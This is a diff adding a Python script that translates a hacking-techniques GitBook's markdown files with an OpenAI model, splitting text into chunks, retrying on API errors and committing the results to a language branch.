+    #print("\033[37m" + str(len(encoding.encode(prompt))) + " tokens\033[0m" + " in prompt: " + "\033[92m" + prompt[:50] + "\033[0m" + ("..." if len(prompt) > 50 else ""))
+    return len(encoding.encode(prompt))
+
+
+def check_git_dir(path):
+    if os.path.isdir(os.path.join(path, '.git')):
+        return True
+    return False
+
+def get_branch_files(branch):
+    """Get a list of all files in a branch."""
+    command = f"git ls-tree -r --name-only {branch}"
+    result = subprocess.run(command.split(), stdout=subprocess.PIPE)
+    files = result.stdout.decode().splitlines()
+    return set(files)
+
+def delete_unique_files(branch):
+    """Delete files that are unique to branch2."""
+    # Get the files in each branch
+    files_branch1 = get_branch_files(MASTER_BRANCH)
+    files_branch2 = get_branch_files(branch)
+
+    # Find the files that are in branch2 but not in branch1
+    unique_files = files_branch2 - files_branch1
+
+    if unique_files:
+        # Switch to the second branch
+        subprocess.run(["git", "checkout", branch])
+
+        # Delete the unique files from the second branch
+        for file in unique_files:
+            subprocess.run(["git", "rm", file])
+        
+        subprocess.run(["git", "checkout", MASTER_BRANCH])
+    
+    print(f"[+] Deleted {len(unique_files)} files from branch: {branch}")
+
+
+def cp_translation_to_repo_dir_and_check_gh_branch(branch, temp_folder, translate_files):
+    branch_exists = subprocess.run(['git', 'show-ref', '--verify', '--quiet', 'refs/heads/' + branch])
+    # If branch doesn't exist, create it
+    if branch_exists.returncode != 0:
+        subprocess.run(['git', 'checkout', '-b', branch])
+    else:
+        subprocess.run(['git', 'checkout', branch])
+    
+    # Walk through source directory
+    for dirpath, dirnames, filenames in os.walk(temp_folder):
+        # Compute destination path
+        dest_path = os.path.join(os.getcwd(), os.path.relpath(dirpath, temp_folder))
+        
+        # Create directory structure in destination, if not already present
+        if not os.path.exists(dest_path):
+            os.makedirs(dest_path)
+        
+        # Copy each file from source to destination
+        for file_name in filenames:
+            src_file = os.path.join(dirpath, file_name)
+            shutil.copy2(src_file, dest_path)
+
+    print(f"Translated files copied to branch: {branch}")
+    
+    if translate_files:
+        subprocess.run(['git', 'add', "-A"])
+        subprocess.run(['git', 'commit', '-m', f"Translated {translate_files} to {branch}"[:72]])
+        subprocess.run(['git', 'checkout', MASTER_BRANCH])
+        print("Commit created and moved to master branch")
+    else:
+        print("No commiting anything, leaving in language branch")
+
+
+def translate_text(language, text, file_path, model, cont=0, slpitted=False, client=None):
+    if not text:
+        return text
+    
+    messages = [
+        {"role": "system", "content": "You are a professional hacker, translator and writer. You write everything super clear and as concise as possible without loosing information. Do not return invalid Unicode output."},
+        {"role": "system", "content": f"The following is content from a hacking book about hacking techiques. The following content is from the file {file_path}. Translate the relevant English text to {language} and return the translation keeping excatly the same markdown and html syntax. Do not translate things like code, hacking technique names, hacking word, cloud/SaaS platform names (like Workspace, aws, gcp...), the word 'leak', pentesting, and markdown tags. Also don't add any extra stuff apart from the translation and markdown syntax."},
+        {"role": "user", "content": text},
+    ]
+    try:
+        response = client.chat.completions.create(
+            model=model,
+            messages=messages,
+            temperature=0
+        )
+    except Exception as e:
+        print("Python Exception: " + str(e))
+        if cont > 6:
+            print(f"Page {file_path} could not be translated due to count with text: {text}\nReturning text as is.")
+            return text
+        if "exceeded your current quota" in str(e).lower():
+            print("Critical error: Quota exceeded")
+            exit(1)
+        
+        if "is currently overloaded" in str(e).lower():
+            print("Overloaded, waiting 30 seconds")
+            time.sleep(30)
+        
+        elif "timeout" in str(e).lower():
+            print("Timeout, waiting 30 seconds")
+            cont += 1
+            time.sleep(30)
+        
+        elif "rate limit" in str(e).lower():
+            print("Rate limit, waiting 60 seconds")
+            cont += 1
+            time.sleep(60)
+        
+        elif "maximum context length" in str(e).lower() or "generated invalid unicode output" in str(e).lower():
+            if "maximum context length" in str(e).lower():
+                print("Maximum context length, splitting text in two and translating separately")
+
+            elif "generated invalid unicode output" in str(e).lower():
+                print("Invalid unicode error detected.")
+
+            if slpitted:
+                #print(f"Page {file_path} could not be translated with text: {text}")
+                print(f"Page {file_path} could not be translated.\nReturning text as is.")
+                return text
+            
+            text1 = text.split('\n')[:len(text.split('\n'))//2]
+            text2 = text.split('\n')[len(text.split('\n'))//2:]
+            return translate_text(language, '\n'.join(text1), file_path, model, cont, False, client) + '\n' + translate_text(language, '\n'.join(text2), file_path, model, cont, True, client)
+
+        print("Retrying translation")
+        return translate_text(language, text, file_path, model, cont, False, client)
+
+    response_message = response.choices[0].message.content.strip()
+
+    # Sometimes chatgpt modified the number of "#" at the beginning of the text, so we need to fix that. This is specially important for the first line of the MD that mucst have only 1 "#"
+    cont2 = 0
+    while (text.startswith('# ') and not response_message[cont2:].startswith('# ')):
+        cont2 += 1
+        if cont2 > 3:
+            cont2 = 0
+            print(f"Error with initial '#', something went wrong, recheck: {response_message[:30]}")
+            break
+    
+    response_message = response_message[cont2:]
+        
+    return response_message
+
+
+def split_text(text, model):
+    global MAX_TOKENS
+    lines = text.split('\n')
+    chunks = []
+    chunk = ''
+    in_code_block = False
+
+    for line in lines:
+        # If we are in a code block, just add the code to the chunk
+        if line.startswith('```'):
+            
+            # If we are in a code block, finish it with the "```"
+            if in_code_block:
+                chunk += line + '\n'
+            
+            in_code_block = not in_code_block
+            chunks.append(chunk.strip())
+            chunk = ''
+
+            # If a code block is started, add the "```" to the chunk
+            if in_code_block:
+                chunk += line + '\n'
+            
+            continue
+
+
+        if (line.startswith('#') and reportTokens(chunk + "\n" + line.strip(), model) > MAX_TOKENS*0.8) or \
+            reportTokens(chunk + "\n" + line.strip(), model) > MAX_TOKENS:
+            
+            chunks.append(chunk.strip())
+            chunk = ''
+        
+        chunk += line.strip() + '\n'
+
+    chunks.append(chunk.strip())
+    return chunks
+
+
+def copy_gitbook_dir(source_path, dest_path):
+    folder_name = ".gitbook/"
+    source_folder = os.path.join(source_path, folder_name)
+    destination_folder = os.path.join(dest_path, folder_name)
+    if not os.path.exists(source_folder):
+        print(f"Error: {source_folder} does not exist.")
+    else:
+        # Copy the .gitbook folder
+        shutil.copytree(source_folder, destination_folder)
+        print(f"Copied .gitbook folder from {source_folder} to {destination_folder}")
+
+def copy_summary(source_path, dest_path):
+    file_name = "SUMMARY.md"
+    source_filepath = os.path.join(source_path, file_name)
+    dest_filepath = os.path.join(dest_path, file_name)
+    shutil.copy2(source_filepath, dest_filepath)
+    print("[+] Copied SUMMARY.md")
+
+def translate_file(language, file_path, file_dest_path, model, client):
+    global VERBOSE
+    
+    if file_path.endswith('SUMMARY.md'):
+        return
+    
+    with open(file_path, 'r', encoding='utf-8') as f:
+        content = f.read()
+    
+    content_chunks = split_text(content, model)
+
+    translated_content = ''
+    start_time = time.time()
+    for chunk in content_chunks:
+        # Don't trasnlate code blocks
+        if chunk.startswith('```'):
+            translated_content += chunk + '\n'
+        else:
+            translated_content += translate_text(language, chunk, file_path, model, cont=0, slpitted=False, client=client) + '\n'
+    
+    elapsed_time = time.time() - start_time
+
+    # make sure directory exists
+    os.makedirs(os.path.dirname(file_dest_path), exist_ok=True)
+    with open(file_dest_path, 'w', encoding='utf-8') as f:
+        f.write(translated_content)
+    
+    #if VERBOSE:
+    print(f"Page {file_path} translated in {elapsed_time:.2f} seconds")
+
+
+def translate_directory(language, source_path, dest_path, model, num_threads, client):
+    all_markdown_files = []
+    for subdir, dirs, files in os.walk(source_path):
+        for file in files:
+            if file.endswith('.md') and file != "SUMMARY.md":
+                source_filepath = os.path.join(subdir, file)
+                dest_filepath = os.path.join(dest_path, os.path.relpath(source_filepath, source_path))
+                all_markdown_files.append((source_filepath, dest_filepath))
+    
+    print(f"Translating {len(all_markdown_files)} files")
+
+    #with tqdm(total=len(all_markdown_files), desc="Translating Files") as pbar:
+    with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
+        futures = []
+        for source_filepath, dest_filepath in all_markdown_files:
+            if os.path.exists(dest_filepath):
+                continue
+            os.makedirs(os.path.dirname(dest_filepath), exist_ok=True)
+            future = executor.submit(translate_file, language, source_filepath, dest_filepath, model, client)
+            futures.append(future)
+
+        for future in concurrent.futures.as_completed(futures):
+            try:
+                future.result()
+                #pbar.update()
+            except Exception as exc:
+                tb = traceback.format_exc()
+                print(f'Translation generated an exception: {exc}')
+                print("Traceback:", tb)
+                
+
+if __name__ == "__main__":
+    print("- Version 1.1.1")
+    # Set up argparse
+    parser = argparse.ArgumentParser(description='Translate gitbook and copy to a new branch.')
+    parser.add_argument('-d', '--directory', action='store_true', help='Translate a full directory.')
+    parser.add_argument('-l', '--language', required=True, help='Target language for translation.')
+    parser.add_argument('-b', '--branch', required=True, help='Branch name to copy translated files.')
+    parser.add_argument('-k', '--api-key', required=True, help='API key to use.')
+    parser.add_argument('-m', '--model', default="gpt-4o-mini", help='The openai model to use. By default: gpt-4o-mini')
+    parser.add_argument('-o', '--org-id', help='The org ID to use (if not set the default one will be used).')
+    parser.add_argument('-f', '--file-paths', help='If this is set, only the indicated files will be translated (" , " separated).')
+    parser.add_argument('-n', '--dont-cd', action='store_false', help="If this is true, the script won't change the current directory.")
+    parser.add_argument('-t', '--threads', default=5, type=int, help="Number of threads to use to translate a directory.")
+    #parser.add_argument('-v', '--verbose', action='store_false', help="Get the time it takes to translate each page.")
+    args = parser.parse_args()
+
+    source_folder = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0])))
+    dest_folder = tempfile.mkdtemp()
+    language = args.language.capitalize()
+    branch = args.branch
+    model = args.model
+    org_id = args.org_id 
+    num_threads = args.threads
+    #VERBOSE = args.verbose
+
+    client = OpenAI(
+        api_key=args.api_key,
+        organization=org_id
+    )
+    
+    # Start with the current directory.
+    current_dir = os.getcwd()
+
+    # Check if model is gpt-3.5
+    if "gpt-3.5" in model:
+        MAX_TOKENS = 2000
+
+    # Check the current directory
+    if check_git_dir(current_dir):
+        print('Found .git directory in current directory: ' + current_dir)
+    else:
+        # Check the parent directory
+        parent_dir = os.path.dirname(current_dir)
+        if check_git_dir(parent_dir):
+            print('Found .git directory in parent directory: ' + parent_dir)
+            
+            # Change the current working directory to the parent directory
+            os.chdir(parent_dir)
+            print('Current working directory has been changed to: ' + os.getcwd())
+        else:
+            print('No .git directory found in current or parent directory. Exiting.')
+            exit(1)
+
+    current_dir = os.getcwd()
+    print(f"The translated files will be copied to {current_dir}, make sure this is the expected folder.")
+
+    if not args.dont_cd:
+        # Change to the parent directory
+        os.chdir(source_folder)
+    
+    translate_files = None # Need to initialize it here to avoid error
+    if args.file_paths:
+        # Translate only the indicated file
+        translate_files = [f for f in args.file_paths.split(' , ') if f]
+        for file_path in translate_files:
+            #with tqdm(total=len(all_markdown_files), desc="Translating Files") as pbar:
+            with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
+                futures = []                
+                future = executor.submit(translate_file, language, file_path, os.path.join(dest_folder, file_path), model, client)
+                futures.append(future)
+
+                for future in concurrent.futures.as_completed(futures):
+                    try:
+                        future.result()
+                        #pbar.update()
+                    except Exception as exc:
+                        print(f'Translation generated an exception: {exc}')
+        
+        # Delete possibly removed files from the master branch
+        delete_unique_files(branch)
+    
+    elif args.directory:
+        # Translate everything
+        translate_directory(language, source_folder, dest_folder, model, num_threads, client)
+    
+    else:
+        print("You need to indicate either a directory or a list of files to translate.")
+        exit(1)
+
+    # Copy summary
+    copy_summary(source_folder, dest_folder)
+
+    # Copy .gitbook folder
+    copy_gitbook_dir(source_folder, dest_folder) 
+
+    # Create the branch and copy the translated files
+    cp_translation_to_repo_dir_and_check_gh_branch(branch, dest_folder, translate_files)